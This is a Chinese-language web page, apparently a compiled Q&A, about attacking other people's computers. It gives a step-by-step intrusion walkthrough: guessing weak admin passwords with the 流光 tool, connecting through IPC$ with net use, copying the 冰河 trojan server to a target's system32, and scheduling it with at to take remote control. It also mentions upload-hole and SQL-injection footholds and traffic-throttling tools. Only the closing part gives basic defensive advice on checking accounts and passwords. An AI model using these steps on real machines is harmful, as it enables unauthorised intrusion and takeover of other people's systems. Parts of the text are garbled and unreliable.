上次的勒索病毒,很多的人中招就是因為電腦默認開啟了443埠。黑客可以通過掃描目標主機開放了哪些埠,然後通過這些埠就可以入侵你的主機了。
3、通過網站入侵
如果黑客的目標主機是一台網路伺服器,ta可以通過找上傳漏洞,然後傳木馬上去。如果沒有上傳漏洞,那就找SQL注入,進入後台,上傳木馬,提取,控制目標伺服器。
『玖』 如何在自己電腦上攻擊他人電腦
其實攻擊別人的電腦不是最讓人頭痛的辦法,要是共同的網線,就下載一個P2P終結者軟體,控制他的流量,急死他! 下面是如何攻擊別人電腦,給你一個網址,你自己可以去學一學,上面有很多方法的http://hi..com/wangyoulian258/blog/item/fe8ce001f05eb3071d95830a.html (一):shed.exe
(二)流光2000
(三)cmd.exe (其實就是2000下的dos啦)!
(四)冰河8.4 操作系統:win2000 server 或者winxp系統。 「shed.exe」:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這裡面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的伺服器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以許可權不夠!有些需要密碼。遇到密碼怎辦?用流光! 「流光」雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然後先簡單探測,此時有些網管懶惰,把administrator設置的過於簡單,呵呵,你就可以抓到了。
下一步如何做呢?也許在你查對方的埠時發現對方開的埠很少,比如ftp沒開,怎辦呢?冰河! 「冰河」,想必許多朋友都玩過,使用冰河控制一台伺服器速度很快,(因為伺服器那邊帶寬很大)幾分鍾就可以查到對方主機的主頁所在位置。但是如何上傳並且控制他呢? 「cmd.exe」 是2000下的dos了,執行cmd.exe 使用net命令,
具體操作如下:
第一步:net use \\ip\ipc$「password」 /user:」user」 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin里的。這里的」ip」就是主機了,「password」就是超級用戶的密碼,「user」就是超級用戶。比如:net use \\210.248.250.2\ipc$ 「maoie」 /user:"maojie"
第二步: g-server.exe \\ip\admin$\system32 說明:g-server.exe就是冰河的遠程伺服器端。意義:將此文件拷貝到對方的主機winnt里的system32目錄里。也許有人要問木馬侵入對方那邊可以察覺出來的吧,呵呵!裝了防火牆估計可以,不過很多主機沒錢買呀!不像中國盜版滿天飛!如果你有最新的木馬也可以的!這是最好的了!!嘿嘿……
第三步:net time \\ip 察看對方的伺服器時間。由於有時差,應該是一個小時吧!所以必須要以對方的伺服器時間為准。
第四步:at \\ip time g-server.exe 這里的time就是對方的主機時間。作用:在規定時間執行該程序。比如at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個我就不說了吧,呵呵!菜鳥也會玩的軟體。
這時我們就可以控制伺服器了,伺服器入侵主要靠的是帳號與密碼。大家要先明白什麼是系統帳號。什麼是系統密碼!
其它WINDOWS每一個系統都有著他的超級管理員帳號與密碼!
一但這些被黑客掃描到的話,哪么你將會得到一個恐怕的威脅!
當你私服是人氣高的時候。給黑客入侵的話,哪要是萬一給刪了數據。到時候。真的是慘不忍堵。
一:了解一下帳號的含義
先運行CMD
然後輸入:net user(回車健)
這樣後,會顯示一例帳號
再查看管理員帳號
輸入:net localgroup administrators
這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號的方法也會查出來!
系統自帶的超級管理員帳號是administrator
記住這里顯示出來多個帳號不明的帳號。哪就證明你機器不安全了。若出現在的帳號都是你自已的帳號。哪百分之四十你機器未被入侵
帳號安全:
二:密碼篇
你若覺得自已的帳號密碼是123456哪么不出三秒人家就到你機上一遊了。
修改密碼方法,在DOS下修改更安全
輸入net user 帳號名 需修改密碼(然後回車健)
一般密碼設復雜一點!